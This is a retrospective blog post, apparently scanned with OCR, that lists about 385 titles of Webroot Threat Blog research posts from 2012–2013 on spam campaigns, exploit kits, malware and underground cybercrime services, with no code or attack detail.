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Historical OSINT - Summarizing 2 Years of Webroot's 
Threat Blog Posts Research (2018-07-28 21:00) 

It's been several years since I last posted a quality update at 
the industry's leading threat-intelligence gathering 

[l]Webroot's Threat Blog following a successful career as 
lead security blogger and threat-intelligence analyst 

throughout 2012-2014. 

In this post I'll summarize two years worth of Webroot's 
Threat Blog research with the idea to provide readers 

with the necessary data information and knowledge to stay 
ahead of current and emerging threats. 

01. January - 2012 

• [2]Cybercriminals generate malicious Java applets using 
DIY tools 

• [3]A peek inside the uBot malware bot 


• [4]Researchers intercept a client-side exploits serving 
malware campaign 

• [5]How phishers launch phishing attacks 

• [6]A peek inside the Umbra malware loader 

• [7]How malware authors evade antivirus detection 

• [8]lnside AnonJDB - a Java based malware distribution 
platforms for drive-by downloads 

• [9]Zappos.com hacked, 24 million users affected 

• [lOJInside a clickjacking/likejacking scam distribution 
platform for Facebook 

• [11 ]A peek inside the Cythosia v2 DDoS Bot 

• [ 12]A peek inside the PickPocket Botnet 

• [13]Mass SQL injection attack affects over 200,000 URLs 

• [14]Email hacking for hire going mainstream 

• [ 15]MiIIions of harvested emails offered for sale 
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02. February - 2012 

• [16]Research: Google's reCAPTCHA underfire 

• [17]Spamvertised 'You have 1 lost message on Facebook' 
campaign leads to pharmaceutical scams 

• [ 18]A peek inside the Smoke Malware Loader 




• [19]Researchers spot Citadel, a ZeuS crimeware variant 

• [20]Researchers intercept two client-side exploits serving 
malware campaigns 

• [21]Pharmaceutical scammers launch their own Web 
contest 

• [22]The United Nations hacked, Team Poison claims 
responsibility 

• [23]Report: Internet Explorer 9 leads in socially- 
engineered malware protection 

• [24]Twitter adds HTTPS support by default 

• [25]Spamvertised "Hallmark ecard" campaign leads to 
malware 

• [26]Report: 3,325 % increase in malware targeting the 
Android OS 

• [27]Why relying on antivirus signatures is simply not 
enough anymore 

• [28]Researchers intercept malvertising campaign using 
Yahoo's ad network 

• [29]A peek inside the Ann Malware Loader 

• [30]Spamvertised Termination of your CPA license' 
campaign serving client-side exploits 

• [31]How cybercriminals monetize malware-infected hosts 

• [32]A peek inside the Elite Malware Loader 

• [33]BlackHole exploit kits gets updated with new features 



03. March - 2012 


• [34]New service converts malware-infected hosts into 
anonymization proxies 

• [35]Spamvertised Temporary Limit Access To Your 
Account' emails lead to Citi phishing emails 

• [36]A peek inside the Darkness (Optima) DDoS Bot 

• [37]Research: proper screening could have prevented 67 
% of abusive domain registrations 

• [38]Spamvertised 'Your accountant license can be 
revoked' emails lead to client-side exploits and malware 

• [39]Spamvertised 'Google Pharmacy' themed emails lead 
to pharmaceutical scams 

• [40]Research: U.S accounts for 72 % of fraudulent 
pharmaceutical orders 

• [41]Millions of harvested U.S government and U.S military 
email addresses offered for sale 

• [42]Trojan Downloaders actively utilizing Dropbox for 
malware distribution 
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• [43]Spamvertised 'Your tax return appeal is declined' 
emails serving client-side exploits and malware 

• [44]Malicious USPS-themed emails circulating in the wild 

• [45]Spamvertised Linkedln notifications serving client-side 
exploits and malware 



• [46]Tens of thousands of web sites affected in ongoing 
mass SQL injection attack 

• [47]Spamvertised Verizon-themed 'Your Bill Is Now 
Available' emails lead to ZeuS crimeware 

• [48]Spamvertised 'Scan from a Hewlett-Packard ScanJet' 
emails lead to client-side exploits and malware 

04. April - 2012 

• [49]Email hacking for hire going mainstream - part two 

• [50]Spamvertised 'US Airways' themed emails serving 
client-side exploits and malware 

• [51]New underground service offers access to hundreds of 
hacked PCs 

• [52]New DIY email harvester released in the wild 

05. May - 2012 

• [53]Managed SMS spamming services going mainstream 

• [54]A peek inside a boutique cybercrime-friendly E-shop 

• [55]Cybercriminals release 'Sweet Orange' - new web 
malware exploitation kit 

• [56]Spamvertised 'Pizzeria Order Details' themed 
campaign serving client-side exploits and malware 

• [57]Poison Ivy trojan spreading across Skype 

• [58]A peek inside a managed spam service 



• [59]Ongoing 'Linkedln Invitation' themed campaign 
serving client-side exploits and malware 


• [60]Spamvertised bogus online casino themed emails 
serving adware 

• [61]Spamvertised 'YouTube Video Approved' and Twitter 
Support" themed emails lead to pharmaceutical 

scams 

• [62]A peek inside a boutique cybercrime-friendly E-shop - 
part two 

• [63]Spamvertised CareerBuilder themed emails serving 
client-side exploits and malware 

• [64]Pop-ups at popular torrent trackers serving 
W32/Casonline adware 

• [65]'Windstream bill' themed emails serving client-side 
exploits and malware 

06. June - 2012 

• [66]Cybercriminals infiltrate the music industry by offering 
full newly released albums for just $1 
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• [67]A peek inside a boutique cybercrime-friendly E-shop - 
part three 

• [68]DDoS for hire services offering to 'take down your 
competitor's web sites' going mainstream 

• [69]Skype propagating Trojan targets Syrian activists 



• [70]Spamvertised 'UPS Delivery Notification' emails 
serving client-side exploits and malware 

• [71]Spamvertised 'DHL Package delivery report' emails 
serving malware 

• [72]Spamvertised 'YourAmazon.com order confirmation' 
emails serving client-side exploits and malware 

• [73]Cybercriminals populate Scribd with bogus adult 
content, spread malware using Comodo Backup 

• [74]Spamvertised 'Your Paypal Ebay.com payment' emails 
serving client-side exploits and malware 

• [75]'Create a Cartoon of You" ads serving MyWebSearch 
toolbar 

• [76]Spamvertised 'Your UPS delivery tracking' emails 
serving client-side exploits and malware 

• [77]Spamvertised 'Confirm PayPal account" notifications 
lead to phishing sites 

• [78]Spamvertised 'DHL Express Parcel Tracking 
Notification' emails serving malware 

• [79]Spamvertised bogus online casino themed emails 
serving W32/Casonline 

07. July - 2012 

• [80]Cybercriminals launch managed SMS flooding services 

• [81]117,000 unique U.S visitors offered for malware 
conversion 



• [82]Phishing campaign targeting Gmail, Yahoo, AOL and 
Hotmail spotted in the wild 

• [83]What's the underground market's going rate for a 
thousand U.S based malware infected hosts? 

• [84]Spamvertised American Airlines themed emails lead to 
Black Hole exploit kit 

• [85]Online dating scam campaign currently circulating in 
the wild 

• [86]New Russian service sells access to compromised 
social networking accounts 

• [87]Cybercriminals impersonate UPS in client-side exploits 
and malware serving spam campaign 

• [88]Russian Ask.fm spamming tool spotted in the wild 

• [89]Spamvertised Intuit themed emails lead to Black Hole 
exploit kit 

• [90]Cybercriminals impersonate Booking.com, serve 
malware using bogus 'Hotel Reservation Confirmation' 

themed emails 

• [91]Spamvertised Craigslist themed emails lead to Black 
Hole exploit kit 

• [92]Cybercriminals impersonate law enforcement, 
spamvertise malware-serving 'Speeding Ticket' themed 

emails 

• [93]Spamvertised 'Download your USPS Label' themed 
emails serve malware 
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• [94]Cybercriminals target Twitter, spread thousands of 
exploits and malware serving tweets 

• [95]Russian spammers release Skype spamming tool 

• [96]Spamvertised 'Your Ebay funds are cleared' themed 
emails lead to Black Hole exploit kit 

08. August - 2012 

• [97]Spamvertised AICPA themed emails lead to Black Hole 
exploit kit 

• [98]Spamvertised 'PayPal has sent you a bank transfer' 
themed emails lead to Black Hole exploit kit 

• [99]Ongoing spam campaign impersonates Linkedln, 
serves exploits and malware 

• [ 100]Mil I ions of spamvertised emails lead to 
W32/Casonline 

• [101]Cybercriminals impersonate AT &T's Billing Service, 
serve exploits and malware 

• [ 102]IRS themed spam campaign leads to Black Hole 
exploit kit 

• [103]Cybercriminals spamvertise bogus greeting cards, 
serve exploits and malware 

• [104]Spamvertised 'Federal Tax Payment Rejected' 
themed emails lead to Black Hole exploit kit 

• [105]Spamvertised 'Fwd: Scan from a Hewlett-Packard 
ScanJet' emails lead to Black Hole exploit kit 



• [106]Spamvertised 'Royal Mail Shipping Advisory' themed 
emails serve malware 

• [107]Cybercriminals impersonate Intuit Market, mass mail 
millions of exploits and malware serving emails 

• [108]Cybercriminals spamvertise PayPay themed 
'Notification of payment received' emails, serve malware 

• [109]Cybercriminals impersonate UPS, serve malware 

09. September - 2012 

• [110]Spamvertised 'Wire Transfer Confirmation'themed 
emails lead to Black Hole exploit kit 

• [111]Intuit themed 'QuickBooks Update: Urgent' emails 
lead to Black Hole exploit kit 

• [112]Cybercriminals resume spamvertising bogus 
greeeting cards, serve exploits and malware 

• [113]Cybercriminals abuse Skype's SMS sending feature, 
release DIY SMS flooders 

• [114]New Russian service sells access to thousands of 
automatically registered accounts 

• [115]Spamvertised 'Your Fedex invoice is ready to be paid 
now' themed emails lead to Black Hole Exploit kit 

• [116]New Russian DIY SMS flooder using ICQ's SMS 
sending feature spotted in the wild 

• [117]Spamvertised 'US Airways reservation confirmation' 
themed emails serve exploits and malware 



• [118]Cybercriminals impersonate FDIC, serve client-side 
exploits and malware 


• [119]Managed Ransomware-as-a-Service spotted in the 
wild 
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• [120]A peek inside a boutique cybercrime-friendly E-shop 
- part four 

• [121]New E-shop selling stolen credit cards data spotted in 
the wild 

• [122]From Russia with iPhone selling affiliate networks 

• [123]New Russian DIY DDoS bot spotted in the wild 

10. October - 2012 

• [124]New Russian DIY DDoS bot spotted in the wild 

• [125]Recently launched E-shop sells access to hundreds of 
hacked PayPal accounts 

• [126]New Russian service sells access to compromised 
Steam accounts 

• [127]'Vodafone Europe: Your Account Balance' themed 
emails serve malware 

• [128]Cybercriminals impersonate UPS, serve client-side 
exploits and malware 

• [129]'Your video may have illegal content' themed emails 
serve malware 



• [130]Cybercriminals spamvertise 'Amazon Shipping 
Confirmation' themed emails, serve client-side exploits and 

malware 

• [131]American Airlines themed emails lead to the Black 
Hole Exploit Kit 

• [132]Bogus Facebook notifications lead to malware 

• [133]Spamvertised 'KLM E-ticket' themed emails serve 
malware 

• [134]'lntuit Payroll Confirmation inquiry' themed emails 
lead to the Black Hole exploit kit 

• [135]Malware campaign spreading via Facebook direct 
messages spotted in the wild 

• [136]'Regarding your Friendster password' themed emails 
lead to Black Hole exploit kit 

• [137]Russian cybercriminals release new DIY DDoS 
malware loader 

• [138]PayPal 'Notification of payment received' themed 
emails serve malware 

• [139]Cybercriminals impersonate Delta Airlines, serve 
malware 

• [140]'Your UPS Invoice is Ready' themed emails serve 
malware 

• [141]Bogus Skype 'Password successfully changed' 
notifications lead to malware 



• [142]Cybercriminals impersonate Verizon Wireless, serve 
client-side exploits and malware 

• [143]Spamvertised 'BT Business Direct Order' themed 
emails lead to malware 

• [144]Cybercriminals spamvertise millions of British 
Airways themed e-ticket receipts, serve malware 

• [145]Cybercriminals spamvertise millions of bogus 
Facebook notifications, serve malware 

• [146]Nuclear Exploit Pack goes 2.0 
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11. November - 2012 

• [147]BofA 'Online Banking Passcode Reset' themed emails 
serve client-side exploits and malware 

• [148]'ADP Immediate Notification' themed emails lead to 
Black Hole Exploit Kit 

• [149]USPS 'Postal Notification' themed emails lead to 
malware 

• [150]'Fwd: Scan from a Xerox W. Pro' themed emails lead 
to Black Hole Exploit Kit 

• [151]'Your Discover Card Services Blockaded' themed 
emails serve client-side exploits and malware 

• [152]'Payroll Account Holded by Intuit' themed emails lead 
to Black Hole Exploit Kit 

• [153]'American Express Alert: Your Transaction is Aborted' 
themed emails serve client-side exploits and mal- 



ware 


• [154]Cybercriminals abuse major U.S SMS gateways, 
release DIY Mail-to-SMS flooders 

• [155]'PayPal Account Modified' themed emails lead to 
Black Hole Exploit Kit 

• [156]Bogus Better Business Bureau themed notifications 
serve client-side exploits and malware 

• [157]Cybercriminals spamvertise bogus eFax Corporate 
delivery messages, serve multiple malware variants 

• [158]Bogus IRS 'Your tax return appeal is declined' themed 
emails lead to malware 

• [159]'Copies of Missing EPLI Policies' themed emails lead 
to Black Hole Exploit Kit 

• [160]Cybercriminals spamvertise bogus 'Microsoft License 
Orders' serve client-side exploits and malware 

• [161]Cybercriminals resume spamvertising 'Payroll 
Account Cancelled by Intuit' themed emails, serve client- 

side exploits and malware 

• [162]Cybercriminals spamvertise millions of FDIC 'Your 
activity is discontinued' themed emails, serve client-side 

exploits and malware 

• [163]Cybercriminals release stealthy DIY mass iFrame 
injecting Apache 2 modules 

• [ 164]MuItipie 'Intercompany' invoice themed campaigns 
serve malware and client-side exploits 



• [165]Bogus Facebook 'pending notifications' themed 
emails serve client-side exploits and malware 

• [166]Cybercriminals target U.K users with bogus 'Pay by 
Phone Parking Receipts' serve malware 

• [167]Bogus DHL 'Express Delivery Notifications' serve 
malware 

• [168]Cybercriminals impersonate Vodafone U.K, spread 
malicious MMS notifications 

• [169]Cybercriminals impersonate T-Mobile U.K, serve 
malware 

• [170]Bogus 'Meeting Reminder'' themed emails serve 
malware 

• [171]Bogus 'Intuit Software Order Confirmations' lead to 
Black Hole Exploit Kit 

• [172]Bogus 'End of August Invoices' themed emails serve 
malware and client-side exploits 
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12. December - 2012 

• [173]DIY malicious domain name registering service 
spotted in the wild 

• [174]Fake 'FedEx Tracking Number' themed emails lead to 
malware 

• [175]Bogus'Facebook Account Cancellation Request' 
themed emails serve client-side exploits and malware 



• [176]Malicious 'Security Update for Banking Accounts' 
emails lead to Black Hole Exploit Kit 

• [177]A peek inside a boutique cybercrime-friendly E-shop 
- part five 

• [178]Fake 'Flight Reservation Confirmations' themed 
emails lead to Black Hole Exploit Kit 

• [179]Malicious 'Sendspace File Delivery Notifications' lead 
to Black Hole Exploit Kit 

• [180]Fake Chase 'Merchant Billing Statement' themed 
emails lead to malware 

• [181]Cybercriminals entice potential cybercriminals into 
purchasing bogus credit cards data 

• [182]Fake 'Change Facebook Color Theme' events lead to 
rogue Chrome extensions 

• [183]Fake 'Citi Account Alert' themed emails lead to Black 
Hole Exploit Kit 

• [184]Spamvertised 'Work at Home" scams impersonating 
CNBC spotted in the wild 

• [185]Pharmaceutical scammers spamvertise YouTube 
themed emails, entice users into purchasing counterfeit 

drugs 

• [186]Cybercriminals resume spamvertising British Airways 
themed E-ticket receipts, serve malware 

• [187]Fake 'UPS Delivery Confirmation Failed' themed 
emails lead to Black Hole Exploit Kit 



12. January - 2013 

• [188]Spamvertised 'Your Recent eBill from Verizon 
Wireless' themed emails serve client-side exploits and mal¬ 
ware 

• [189]Fake BBB (Better Business Bureau) Notifications lead 
to Black Hole Exploit Kit 

• [190]'Attention! Changes in the bank reports!' themed 
emails lead to Black Hole Exploit Kit 

• [191]Fake 'You have made an Ebay purchase' themed 
emails lead to client-side exploits and malware 

• [ 192]A peek inside a boutique cybercrime-friendly E-shop 
- part six 

• [193]Black Hole Exploit Kit author's 'vertical market 
integration' fuels growth in malicious Web activity 

• [194]Spamvertised AICPA themed emails serve client-side 
exploits and malware 

• [195]'Please confirm your U.S Airways online registration' 
themed emails lead to Black Hole Exploit Kit 

• [196]Malicious DIY Java applet distribution platforms going 
mainstream 

• [197]Fake 'ADP Speedy Notifications' lead to client-side 
exploits and malware 
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• [198]Cybercriminals release automatic CAPTCHA-solving 
bogus Youtube account generating tool 



• [199]'Batch Payment File Declined' EFTPS themed emails 
lead to Black Hole Exploit Kit 

• [200]Cybercriminals resume spamvertising fake Vodafone 
'A new picture or video message' themed emails, 

serve malware 

• [201]Leaked DIY malware generating tool spotted in the 
wild 

• [202]Email hacking for hire going mainstream - part three 

• [203]Android malware spreads through compromised 
legitimate Web sites 

• [204]Fake Intuit 'Direct Deposit Service Informer' themed 
emails lead to Black Hole Exploit Kit 

• [205]Fake Linkedln 'Invitation Notifications' themed emails 
lead to client-side exploits and malware 

• [206]Novice cybercriminals experiment with DIY 
ransomware tools 

• [207]Bogus 'Your Paypal Transaction Confirmation' themed 
emails lead to Black Hole Exploit Kit 

• [208]Fake 'FedEx Online Billing - Invoice Prepared to be 
Paid' themed emails lead to Black Hole Exploit Kit 

• [209]A peek inside a DIY password stealing malware 

• [210]Malicious'Facebook Account Cancellation Request” 
themed emails serve client-side exploits and malware 


12. February - 2013 



• [211]Fake Booking.com 'Credit Card was not Accepted' 
themed emails lead to malware 

• [212]Fake FedEx Tracking ID/Tracking Number/Tracking 
Detail' themed emails lead to malware 

• [213]'Your Kindle e-book Amazon receipt' themed emails 
lead to Black Hole Exploit Kit 

• [214]New DIY HTTP-based botnet tool spotted in the wild 

• [215]Mobile spammers release DIY phone number 
harvesting tool 

• [216]New underground service offers access to thousands 
of malware-infected hosts 

• [217]Targeted 'phone ring flooding' attacks as a service 
going mainstream 

• [218]Fake 'You've blocked/disabled your Facebook 
account' themed emails serve client-side exploits and mal¬ 
ware 

• [219]Spamvertised IRS 'Income Tax Refund Turned Down' 
themed emails lead to Black Hole Exploit Kit 

• [220]Malware propagates through localized Facebook Wall 
posts 

• [221]Malicious 'RE: Your Wire Transfer' themed emails 
serve client-side exploits and malware 

• [222]New underground E-shop offers access to hundreds 
of hacked PayPal accounts 



• [223]Fake 'Verizon Wireless Statement” themed emails 
lead to Black Hole Exploit Kit 

• [224]DIY malware cryptor as a Web service spotted in the 
wild 
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• [225]Malicious 'Data Processing Service' ACH File ID 
themed emails serve client-side exploits and malware 

• [226]How mobile spammers verify the validity of 
harvested phone numbers 

• [227]How much does it cost to buy 10,000 U.S.-based 
malware-infected hosts? 

13. March - 2013 

• [228]New DIY IRC-based DDoS bot spotted in the wild 

• [229]Cybercriminals release new Java exploits centered 
exploit kit 

• [230]Segmented Russian "spam leads" offered for sale 

• [231]New DIY hacked email account content grabbing tool 
facilitates cyber espionage on a mass scale 

• [232]New DIY unsigned malicious Java applet generating 
tool spotted in the wild 

• [233]Commercial Steam 'information harvester/mass 
group inviter' could lead to targeted fraudulent cam¬ 


paigns 



• [234]Fake BofA CashPro 'Online Digital Certificate" themed 
emails lead to malware 

• [235]Spamvertised BBB 'Your Accreditation Terminated" 
themed emails lead to Black Hole Exploit Kit 

• [236]New ZeuS source code based rootkit available for 
purchase on the underground market 

• [237]Cybercriminals resume spamvertising 'Re: Fwd: Wire 
Transfer' themed emails, serve client-side exploits 

and malware 

• [238]'ADP Package Delivery Notification' themed emails 
lead to Black Hole Exploit Kit 

• [239]Cybercrime-friendly community branded HTTP/SMTP 
based keylogger spotted in the wild 

• [240]Hacked PCs as 'anonymization stepping-stones' 
service operates in the open since 2004 

• [241]Fake 'CNN Breaking News Alerts' themed emails lead 
to Black Hole Exploit Kit 

• [242]Spotted: cybercriminals working on new Western 
Union based 'money mule management' script 

• [243]Malicious 'BBC Daily Email' Cyprus bailout themed 
emails lead to Black Hole Exploit Kit 

• [244]'ADP Payroll Invoice' themed emails lead to malware 

• [245]'Terminated Wire Transfer Notification/ACH File ID" 
themed malicious campaigns lead to Black Hole Exploit 


Kit 



• [246]New DIY RDP-based botnet generating tool leaks in 
the wild 

• [247]A peek inside the EgyPack Web malware exploitation 
kit 

14. April - 2013 

• [248]DIY Java-based RAT (Remote Access Tool) spotted in 
the wild 

• [249]Spamvertised 'Re: Changelog as promised' themed 
emails lead to malware 
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• [250]Cybercrime-friendly service offers access to tens of 
thousands of compromised accounts 

• [251]Madi/Mahdi/Flashback OS X connected malware 
spreading through Skype 

• [252]Cybercriminals selling valid 'business card' data of 
company executives across multiple verticals 

• [253JA peek inside the 'Zerokit/Okit/ringO bundle' bootkit 

• [254JDIY Skype ring flooder offered for sale 

• [255]Spamvertised 'Your order for helicopter for the 
weekend' themed emails lead to malware 

• [256JA peek inside a 'life cycle aware' underground 
market ad for a private keylogger 

• [257]American Airlines 'You can download your ticket' 
themed emails lead to malware 



• [258]Cybercriminals offer spam-friendly SMTP servers for 
rent [259] 

• [260]How mobile spammers verify the validity of 
harvested phone numbers - part two 

• [261]A peek inside a (cracked) commercially available RAT 
(Remote Access Tool) 

• [262]DIY Russian mobile number harvesting tool spotted 
in the wild 

• [263]DIY SIP-based TDoS tool/number validity checker 
offered for sale 

• [264]CAPTCHA-solving Russian email account registration 
tool helps facilitate cybercrime 

• [265]Historical OSINT - The 'Boston Marathon explosion' 
and 'Fertilizer plant explosion in Texas' themed mal¬ 
ware campaigns 

• [266]Fake 'DHL Delivery Report' themed emails lead to 
malware 

• [267]Cybercriminals impersonate Bank of America (BofA), 
serve malware 

• [268]How fraudulent blackhat SEO monetizers apply 
Quality Assurance (QA) to their DIY doorway generators 

• [269]Managed 'Russian ransomware' as a service spotted 
in the wild 


15. May - 2013 



• [270]FedWire 'Your Wire Transfer' themed emails lead to 
malware 

• [271]A peek inside a CVE-2013-0422 exploiting DIY 
malicious Java applet generating tool 

• [272]New IRC/HTTP based DDoS bot wipes out competing 
malware 

• [273]New version of DIY Google Dorks based mass website 
hacking tool spotted in the wild 

• [274]Citibank 'Merchant Billing Statement' themed emails 
lead to malware 

• [275]Fake Amazon 'Your Kindle E-Book Order' themed 
emails circulating in the wild, lead to client-side exploits 

and malware 

• [276]Cybercriminals impersonate New York State's 
Department of Motor Vehicles (DMV), serve malware 

• [277]Cybercriminals offer HTTP-based keylogger for sale, 
accept Bitcoin 
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• [278]Newly launched E-shop for hacked PCs charges 
based on malware 'executions' 

• [279]New subscription-based 'stealth Bitcoin miner' 
spotted in the wild 

• [280]Fake 'Free Media Player' distributed via rogue 'Adobe 
Flash Player HD' advertisement 



• [281]New versatile and remote-controlled 
"Android.MouaBot" malware found in the wild 

• [282]Newly launched 'Magic Malware' spam campaign 
relies on bogus 'New MMS' messages 

• [283]Commercial 'form grabbing' rootkit spotted in the 
wild 

• [284]DIY malware cryptor as a Web service spotted in the 
wild - part two 

• [285]CVs and sensitive info soliciting email campaign 
impersonates NATO 

• [286]New commercially available DIY invisible Bitcoin 
miner spotted in the wild 

• [287]Fake 'Export License/Payment Invoice' themed emails 
lead to malware 

• [288]Compromised Indian government Web site leads to 
Black Hole Exploit Kit 

• [289]Cybercriminals resume spamvertising Citibank 
'Merchant Billing Statement' themed emails, serve mal¬ 
ware 

• [290]Marijuana-themed DDoS for hire service spotted in 
the wild 

• [291]Fake 'Vodafone U.K Images' themed malware serving 
spam campaign circulating in the wild 


16. June - 2013 



• [292]Compromised FTP/SSH account privilege-escalating 
mass iFrame embedding platform released on the un¬ 
derground marketplace 

• [293]New E-shop sells access to thousands of hacked PCs, 
accepts Bitcoin 

• [294]Pharmaceutical scammers impersonate Facebook's 
Notification System, entice users into purchasing coun¬ 
terfeit drugs 

• [295]iLivid ads lead to 'Searchqu Toolbar/Search Suite' 
PUA (Potentially Unwanted Application) 

• [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, 
Skype, Twitter, Instagram, Tumblr, Freelancer accounts 

offered for sale 

• [297]Scammers impersonate the UN Refugee Agency 
(UNHCR), seek your credit card details 

• [298]Fake 'Unsuccessful Fax Transmission' themed emails 
lead to malware 

• [299]Tens of thousands of spamvertised emails lead to 
W32/Casonline 

• [300]Rogue ads lead to SafeMonitorApp Potentially 
Unwanted Application (PUA) 

• [301]How cybercriminals apply Quality Assurance (QA) to 
their malware campaigns before launching them 

• [302]Rogue ads target EU users, expose them to 
Win32/Toolbar.SearchSuite through the KingTranslate PUA 



• [303]New boutique iFrame crypting service spotted in the 
wild 
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• [304]Rogue 'Oops Video Player' attempts to visually socia 
engineer users, mimicks Adobe Flash Player's installation 
process 

• [305]New E-Shop sells access to thousands of malware- 
infected hosts, accepts Bitcoin 

• [306]New subscription-based SHA256/Scrypt supporting 
stealth DIY Bitcoin mining tool spotted in the wild 

• [307]Rogue 'Free Mozilla Firefox Download' ads lead to 
'InstallCore' Potentially Unwanted Application (PUA) 

• [308]SIP-based API-supporting fake caller ID/SMS number 
supporting DIY Russian service spotted in the wild 

• [309]Rogue 'Free Codec Pack' ads lead to 
Win32/lnstallCore Potentially Unwanted Application (PUA) 

• [310]Self-propagating ZeuS-based source code/binaries 
offered for sale 

• [311]How cybercriminals create and operate Android- 
based botnets 

17. July - 2013 

• [312]Cybercriminals experiment with Tor-based C &C, ring 
3-rootkit empowered, SPDY form grabbing malware 

bot 



• [313]Deceptive ads targeting German users lead to the 
'W32/SomotoBetterlnstaller' Potentially Unwanted Ap¬ 
plication (PUA) 

• [314]Newly launched underground market service 
harvests mobile phone numbers on demand 

• [315]Novel ransomware tactic locks users' PCs, demands 
that they participate in a survey to get the unlock code 

• [316]Spamvertised 'Export License/Invoice Copy' themed 
emails lead to malware 

• [317]Cybercriminals spamvertise tens of thousands of fake 
'Your Booking Reservation at Westminster Hotel' 

themed emails, serve malware 

• [318]New commercially available mass FTP-based proxy¬ 
supporting doorway/malicious script uploading appli¬ 
cation spotted in the wild 

• [319]Fake 'iG04 Private Car Insurance Policy Amendment 
Certificate' themed emails lead to malware 

• [320]Tens of thousands of spamvertised emails lead to the 
Win32/PrimeCasino PUA (Potentially Unwanted 

Application) 

• [321]Spamvertised 'Vodafone U.K MMS ID/Fake Sage 50 
Payroll' themed emails lead to (identical) malware 

• [322]New commercially available Web-based 
WordPress/Joomla brute-forcing tool spotted in the wild 



• [323]Rogue ads targeting German users lead to 
Win32/lnstallBrain PUA (Potentially Unwanted Application) 

• [324]Yet another commercially available stealth 
Bitcoin/Litecoin mining tool spotted in the wild 

• [325]Protected: Deceptive 'Media Player Update' ads 
expose users to the rogue 'Video Downloader/Bundlore' 

Potentially Unwanted Application (PUA) 

• [326]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities 
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• [327]Fake 'Copy of Vodafone U.K Contract/Your Monthly 
Vodafone Bill is Ready/New MMS Received' themed 

emails lead to malware 

• [328]Rogue ads lead to the 'Free Player' Win32/Somoto 
Potentially Unwanted Application (PUA) 

• [329]How much does it cost to buy one thousand 
Russian/Eastern European based malware-infected hosts? 

• [330]Custom USB sticks bypassing Windows 7/8's AutoRu 
protection measure going mainstream 

• [331]DIY commercially-available 'automatic Web site 
hacking as a service' spotted in the wild 


18. August - 2013 



• [332]'Malware-infected hosts as stepping stones' service 
offers access to hundreds of compromised U.S based 

hosts 

• [333]New 'Hacked shells as a service' empowers 
cybercriminals with access to high page rank-ed Web sites 

• [334]Fake 'iPhone Picture Snapshot Message' themed 
emails lead to malware 

• [335]Malicious Bank of America (BofA) 'Statement of 
Expenses' themed emails lead to client-side exploits and 

malware 

• [336]Cybercriminals spamvertise fake '02 U.K MMS' 
themed emails, serve malware 

• [337]One-stop-shop for spammers offers DKIM-verified 
SMTP servers, harvested email databases and training 

to potential customers 

• [338]Fake 'Apple Store Gift Card' themed emails serve 
client-side exploits and malware 

• [339]Newly launched managed 'malware dropping' service 
spotted in the wild 

• [340]Cybercrime-friendly underground traffic exchange 
helps facilitate fraudulent and malicious activity 

• [341]From Vietnam with tens of millions of harvested 
emails, spam-ready SMTP servers and DIY spamming 


tools 



• [342]DIY Craigslist email collecting tools empower 
spammers with access to fresh/valid email addresses 

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez 
hosting service operates in the open since 2009 

• [344]DIY automatic cybercrime-friendly 'redirectors 
generating' service spotted in the wild 

• [345]Cybercriminals offer spam-ready SMTP servers for 
rent/direct managed purchase 

• [346]Cybercrime-friendly underground traffic exchanges 
help facilitate fraudulent and malicious activity - part 

two 

19. September - 2013 

• [347]DIY malicious Android APK generating 'sensitive 
information stealer' spotted in the wild 

• [348]Web-based DNS amplification DDoS attack mode 
supporting PHP script spotted in the wild 

• [349]Managed Malicious Java Applets Hosting Service 
Spotted in the Wild 
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• [350]Affiliate network for mobile malware impersonates 
Google Play, tricks users into installing premium-rate SMS 
sending rogue apps 

• [351J419 advance fee fraudsters abuse CNN's 'Email This' 
Feature, spread Syrian Crisis themed scams 



• [352]Cybercriminals offer anonymous mobile numbers for 
'SMS activation', video tape the destruction of the 

SIM card on request 

• [353]Yet another 'malware-infected hosts as 
anonymization stepping stones' service offering access to 
hundreds 

of compromised hosts spotted in the wild 

• [354]Cybercriminals experiment with 
'Socks4/Socks5/HTTP' malware-infected hosts based DIY DoS 
tool 

• [355]Cybercriminals sell access to tens of thousands of 
malware-infected Russian hosts 

• [356]Spamvertised "FDIC: Your business account" themed 
emails serve client-side exploits and malware 

• [357]Cybercriminals experiment with Android compatible, 
Python-based SQL injecting releases 

• [358]Newly launched E-shop offers access to hundreds of 
thousands of compromised accounts 

• [359]DIY commercial CAPTCHA-solving automatic email 
account registration tool available on the underground 

market since 2008 

• [360]Yet another subscription-based stealth Bitcoin mining 
tool spotted in the wild 


20. October - 2013 



• [361]A peek inside a Blackhat SEO/cybercrime-friendly 
doorways management platform 

• [362]Newly launched 'HTTP-based botnet setup as a 
service' empowers novice cybercriminals with bulletproof 

hosting capabilities - part two [363] 

• [364]'T-Mobile MMS message has arrived' themed emails 
lead to malware 

• [365]DDoS for hire vendor 'vertically integrates' starts 
offering TDoS attack capabilities 

• [366]Commercially available Blackhat SEO enabled multi- 
third-party product licenses empowered VPSs spotted 

in the wild 

• [367]New cybercrime-friendly iFrames-based E-shop for 
traffic spotted in the wild 

• [368]Cybercriminals offer spam-friendly SMTP servers for 
rent - part two 

• [369]Newly launched VDS-based cybercrime-friendly 
hosting provider helps facilitate fraudulent/malicious on¬ 
line activity 

• [370]Fake 'You have missed emails' GMail themed emails 
lead to pharmaceutical scams 

• [371]Compromised Turkish Government Web site leads to 
malware 

• [372]Novice cyberciminals offer commercial access to five 
mini botnets 



• [373]Spamvertised T-Mobile 'Picture ID Type:MMS" themed 
emails lead to malware 


• [374]Yet another Bitcoin accepting E-shop offering access 
to thousands of hacked PCs spotted in the wild 
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• [375]Malicious 'FW: File' themed emails lead to malware 

• [376]Mass iframe injection campaign leads to Adobe Flash 
exploits 

• [377]Rogue ads lead to the 'Mipony Download 
Accelerator/FunMoods Toolbar' PUA (Potentially Unwanted 
Ap¬ 


plication) 

• [378]A peek inside the administration panel of a 
standardized E-shop for compromised accounts 

• [379]U.K users targeted with fake 'Confirming your Sky 
offer' malware serving emails 

• [380]New DIY compromised hosts/proxies syndicating tool 
spotted in the wild 

• [381]Rogue ads lead to the 'EzDownloaderpro' PUA 
(Potentially Unwanted Application) 

• [382]Fake 'Scanned Image from a Xerox WorkCentre' 
themed emails lead to malware 

• [383]Fake 'Important: Company Reports' themed emails 
lead to malware 



• [384]Cybercriminals release new commercially available 
Android/BlackBerry supporting mobile malware bot 

• [385]Fake WhatsApp 'Voice Message Notification/1 New 
Voicemail' themed emails lead to malware 

